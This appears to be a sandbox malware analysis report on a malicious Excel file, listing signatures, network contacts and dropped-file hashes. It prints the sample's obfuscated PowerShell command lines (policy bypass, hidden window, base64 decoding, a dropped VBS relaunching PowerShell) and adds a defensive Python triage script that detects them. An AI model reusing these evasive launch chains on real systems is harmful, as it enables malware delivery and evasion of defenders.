Malware Analysis Report

2024-12-07 16:58

Sample ID: 241113-ct965avdkg

Target: 544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls

SHA256: 544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a

Tags: defense_evasion discovery execution

Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a

Threat Level: Known bad

The file 544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-13 02:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-13 02:23

Reported: 2024-11-13 02:25

Platform: win7-20240903-en

Max time kernel: 140s

Max time network: 141s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2596 wrote to memory of 2144 (4 events) | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2144 wrote to memory of 1696 (4 events) | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 1508 (4 events) | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1508 wrote to memory of 2880 (4 events) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2144 wrote to memory of 2092 (4 events) | N/A | C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE | C:\Windows\SysWOW64\WScript.exe
PID 2092 wrote to memory of 1856 (4 events) | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 1888 (4 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE

"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'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'+[ChAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7jkvdvij.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72C1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC72C0.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
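The command lines above carry the evasion in plain sight once the string tricks are undone: the interpreter path and name are hand-mangled in case (winDoWSPOWErShELL, pOWeRSheLl), `::` and the quote characters are assembled from `[cHAR]58` / `[ChAR]0X3A` / `[chaR]0X22` fragments, the switches `-eX byPaSS -nOP -W 1` request an execution-policy bypass, no profile and a hidden window, DeviceCredentialDeployment.exe (a signed Windows binary that hides the console window of its caller, the behaviour behind the "Evasion via Device Credential Deployment" signature) is invoked before the decoded payload runs, csc.exe/cvtres.exe under PowerShell is an on-the-fly C# compile (matching 7jkvdvij.0.cs and 7jkvdvij.cmdline in Temp), and the chain drops a .vbS in Roaming that relaunches PowerShell. The following triage script is an added example written for this page, not sandbox output or the sample's code: it deobfuscates the `[char]`+concatenation idiom, tags each command line, and flags the suspicious parent/child edges. The tag names, the set of canonical interpreter spellings, and the parent/child list (reconstructed from the WriteProcessMemory table; Excel to mshta is explicit in behavioral2) are the editor's assumptions, and the base64 body `QUJD` is a constructed placeholder because the report redacts the real one.

```python
"""Triage the behavioral1 process chain: deobfuscate PowerShell command lines,
tag evasion switches, flag suspicious parent/child edges.
Added example by the editor; rules and sample data are assumptions, not sandbox output."""
import re

# Command lines copied from the Processes section; 'QUJD' is a constructed
# stand-in for the redacted base64 payload (it decodes to "ABC").
CMDLINES = [
    r'''"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls''',
    r'''C:\Windows\SysWOW64\mshta.exe -Embedding''',
    r'''"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'QUJD'+[ChAr]34+'))')))"''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe''',
    r'''"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7jkvdvij.cmdline"''',
    r'''"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'QUJD';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD''',
]

CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)

def deobfuscate(cmd):
    """Resolve [char]N / [char]0xNN tokens and the '+' concatenation that splits
    keywords such as '::' and '"' across string fragments."""
    def to_char(m):
        v = m.group(1)
        return "'" + chr(int(v, 16) if v.lower().startswith("0x") else int(v)) + "'"
    return re.sub(r"'\s*\+\s*'", "", CHAR_TOKEN.sub(to_char, cmd))

# Spellings a legitimate launcher would use (assumption); anything else was typed by hand.
CANON = {"powershell", "POWERSHELL", "PowerShell", "Powershell",
         "windowspowershell", "WINDOWSPOWERSHELL", "WindowsPowerShell"}

def mangled_case_tokens(cmd):
    """Interpreter names like 'pOWeRSheLl' defeat case-sensitive string matching."""
    return [m.group(0) for m in re.finditer(r"(?i)(windows)?powershell", cmd)
            if m.group(0) not in CANON]

# A PowerShell invocation: the name at a path/quote/space boundary, not the
# 'WindowsPowerShell' directory component.
INVOCATION = re.compile(r"(?<![a-z])powershell(\.exe)?(?=[\"'\s;]|$)")

def indicators(cmd):
    """Evasion/execution tags for one command line (matched on the deobfuscated, lowercased form)."""
    low = deobfuscate(cmd).lower()
    tags = set()
    if mangled_case_tokens(cmd):
        tags.add("mangled_interpreter_case")
    if re.search(r"-e(x|p|xecutionpolicy)\s+bypass", low):
        tags.add("execution_policy_bypass")
    if re.search(r"-nop(rofile)?\b", low):
        tags.add("no_profile")
    if re.search(r"-w(indowstyle)?\s+(1|hidden)\b", low):
        tags.add("hidden_window")
    if "devicecredentialdeployment" in low:
        tags.add("devicecredentialdeployment_lolbin")  # signed binary that hides the caller's console
    if "frombase64string" in low:
        tags.add("base64_payload")
    if len(INVOCATION.findall(low)) >= 2:
        tags.add("nested_powershell")  # PowerShell re-launching PowerShell
    if re.search(r"\\mshta\.exe\s+-embedding", low):
        tags.add("mshta_com_activation")
    if re.search(r"\\[wc]script\.exe.*\\appdata\\", low):
        tags.add("script_host_from_appdata")
    if re.search(r"\\csc\.exe.*\\temp\\", low):
        tags.add("runtime_csharp_compile")  # Add-Type style compile of a Temp .cs file
    return tags

# Parent -> child edges reconstructed from the WriteProcessMemory table (one per
# pair; the report lists several writes per pair). Excel -> mshta is explicit in behavioral2.
EDGES = [
    ("EXCEL.EXE", "mshta.exe"),
    ("mshta.exe", "pOWeRSheLl.EXE"),
    ("pOWeRSheLl.EXE", "powershell.exe"),
    ("pOWeRSheLl.EXE", "csc.exe"),
    ("csc.exe", "cvtres.exe"),
    ("pOWeRSheLl.EXE", "WScript.exe"),
    ("WScript.exe", "powershell.exe"),
    ("powershell.exe", "powershell.exe"),
]
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

def suspicious_edges(edges):
    """Parent/child pairs a process-lineage rule would alert on."""
    out = []
    for parent, child in edges:
        p, c = parent.lower(), child.lower()
        if p in OFFICE and c in SCRIPT_HOSTS:
            out.append((parent, child, "office_spawns_script_host"))
        elif p in {"mshta.exe", "wscript.exe", "cscript.exe"} and c == "powershell.exe":
            out.append((parent, child, "script_host_spawns_powershell"))
        elif p == "powershell.exe" and c == "csc.exe":
            out.append((parent, child, "powershell_compiles_csharp"))
    return out

def triage(cmdlines=CMDLINES, edges=EDGES):
    """Per-command-line tags plus flagged edges, in the order the report lists processes."""
    return {"cmdlines": [sorted(indicators(c)) for c in cmdlines],
            "edges": suspicious_edges(edges)}

if __name__ == "__main__":
    result = triage()
    for cmd, tags in zip(CMDLINES, result["cmdlines"]):
        print(cmd[:70] + "...", tags)
    for edge in result["edges"]:
        print(*edge)
```

Running the script against the seven command lines gives an empty tag set for the Excel launch (the `/dde` switch is the normal shell-association launch), a single `mshta_com_activation` tag for mshta, and the full set of seven evasion tags for the mangled pOWeRSheLl.EXE line; four of the eight lineage edges are flagged. The deobfuscation step matters for rules keyed on `::` or on a quoted base64 string, since those never appear literally in the obfuscated command line.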

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 198.46.178.167:80 198.46.178.167 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.46.178.167:80 198.46.178.167 tcp
US 198.46.178.167:80 198.46.178.167 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

memory/2756-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2756-1-0x000000007293D000-0x0000000072948000-memory.dmp

memory/2596-18-0x0000000002B40000-0x0000000002B42000-memory.dmp

memory/2756-19-0x0000000002EF0000-0x0000000002EF2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 3363ae10035fe2fde456741f86fa00c5
SHA1 cff599a5546fc982bb6c4c718e55b76ec99704d4
SHA256 3296de50e74299b03d980d4a7fb5e7af7003d5ac369f851fdc733adf4a27653e
SHA512 ab7f52274342da7991894aceb4d09dc47bc46559a9890cd2505a0e435dcb5dd6d089041e6462e00e12a2c1a9edf39988906ba88a15e96508ff27f8b59af280df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 8b44abc3c23b25928169906d92ea0912
SHA1 326439cb6e138b5176f52b536ebd23b54233ff0b
SHA256 ee6e5caa510830fbee7cb77e8f57cfbf0d9e401d06260776c0388a5aa66f0333
SHA512 f0b8ac1a85a6382aac10016a6ef6e23d61f6c3c0288b2129b173ed453c99f1bf6975a57c9a58913220b96a38581ec4d4ea926a319febc70831f6680d8258c33a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a363d054afff07f9cfa92aa11934afd1
SHA1 8d5e98ead8975f3b33ec61b91f6e8999b3cdfefd
SHA256 b33051b1b39c83d9e45494e41e663c71538ffe771de709128dae044834e37fd2
SHA512 20e204a11c55d126e459cb5a499e5f09a4f8f3db7af35a2e00db27419d208c4c93189748df0f173c86a390174685dc26b912b90023d139a3285f9392134e1081

C:\Users\Admin\AppData\Local\Temp\Cab69EA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\seemybestpartaroundtheworldtogetmethingsfornewone[1].hta

MD5 fa26f1bca49d7fac5a0150c69f718b19
SHA1 d143c88ad2906d1a81c1f06c2d931d04970e0f9e
SHA256 fdfedc9927a45e7728387b3cc323023950295cb66c7273820bcf0d7d9e97d53c
SHA512 10b0b1c95b26d931857cce2011c6c8d7e40337a899419bdd3e8fd1f90ea8e6837c0dd5ff9f0a2ef5752c3bb2b618290772addf459d54bdf0fb8d036ec52614ec

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4562dd9392e0782c75232e0f208f77d4
SHA1 19e7dca9afe5f4534cb2b49148fca0b605f0d296
SHA256 109825284f2431a3bdb5111e0e0771fda14dbf499ef8d76b985b174fa3e4a752
SHA512 28b13d82a9e2aa86834109e249c8547f832f84ee13bf762990aedcb2dd6d1b65a01faf7e2c720ebd5931393d16a365bdb17e2927ff743434d279030661cdf955

\??\c:\Users\Admin\AppData\Local\Temp\7jkvdvij.cmdline

MD5 2a771eeda925e16b98c954042c979e03
SHA1 e3d7c637edfc927b8a46bf54615cb2446a7dc1ba
SHA256 5fa24c9a79cb80a3af1b8df2e8e73ede312016ea0f06b03382e905ca38a8b94b
SHA512 0f9b5309ca52bd366e2c05407f60a9f17e29ca4b0e0e5203c665be889a200ec888929ec098ef61ec12cd8d56530e08234f2021ede89b18e85017f29e09b441b3

\??\c:\Users\Admin\AppData\Local\Temp\7jkvdvij.0.cs

MD5 0b9734ed54c4f41d0c94957b007eb3d5
SHA1 ebabbb2d826295a994ba691d921a4c7c5ed506d1
SHA256 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
SHA512 d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17

\??\c:\Users\Admin\AppData\Local\Temp\CSC72C0.tmp

MD5 8dbe73734f4a2b75f5eba53420b61a14
SHA1 f37c29f8eadd87d37a938f668aac12df3d8e12ef
SHA256 daf71138513da40ef458d07b333f16c2313792248394de423bd07d207827040e
SHA512 1f601f2f37120126396c45282de1078ecd3ba9cb962f6beb7c2327f4774ed84265f3a8e52a8dbcf88d32c1debdd96798765c56ce60079c01274e7686446883a1

C:\Users\Admin\AppData\Local\Temp\7jkvdvij.dll

MD5 3c3fbe0fbd3f248bcbf824d5bb2f1e95
SHA1 738f8569518b4183c61ebf06d0d662e31453bdc5
SHA256 4d83cd2efc973b57f70dec70cfcfa8e007b5242780d89f7d1260c3c19a2af210
SHA512 39e549c26c3c8aee7c37ff708244fd34143e901485cc0f247877494f147bedf81acba274b599687012b4cbc71de615c56b3f53de47515ddfb7b326a0c4f3c97e

C:\Users\Admin\AppData\Local\Temp\RES72C1.tmp

MD5 11ce1637cd240911c451d75c165273a2
SHA1 705c802e5b970d49ba073c05d348a4cf8f6a7d70
SHA256 2fe01115fac832b15d210fd303cb3fceabe741ac9b6bc200fb8eb675fbebff36
SHA512 a2710657f93a0efe9884f3907e55a9a1ffd145956e18553ab6bc2d6de2b4775cec5af0ed54d81cb6fb42cae183aed18a9efd14a1202450d471bdfbdf85847a2a

C:\Users\Admin\AppData\Local\Temp\7jkvdvij.pdb

MD5 eb2033527eada3f7ee82f018b00d6d86
SHA1 505c922b0ef134d7d9bb5b009d50f6e4263d7847
SHA256 c0d4f44f5ab16bd3a88d7a989d3cb32dba001a4550db2c4e753d6a7e6ef28f34
SHA512 fd733bc186b490a20b9b388fcd97ea733ca327df1f0a32763abaa455e7be58379500da7f437d99d3267b4913a310dc41d917b23d4617236f3f8d1ebdd5863aab

C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS

MD5 4f46597a54e903c400cac4db5a222ecb
SHA1 0a2f30da05a532bfbddaba3af235011d60db8fc8
SHA256 ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
SHA512 ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a

\??\PIPE\srvsvc (zero-length; the hashes below are those of empty input and are not usable as indicators)

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2756-77-0x000000007293D000-0x0000000072948000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-13 02:23

Reported: 2024-11-13 02:25

Platform: win10v2004-20241007-en

Max time kernel: 143s

Max time network: 133s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 452 wrote to memory of 4876 (2 events) | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 10.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 198.46.178.167:80 198.46.178.167 tcp
US 8.8.8.8:53 167.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
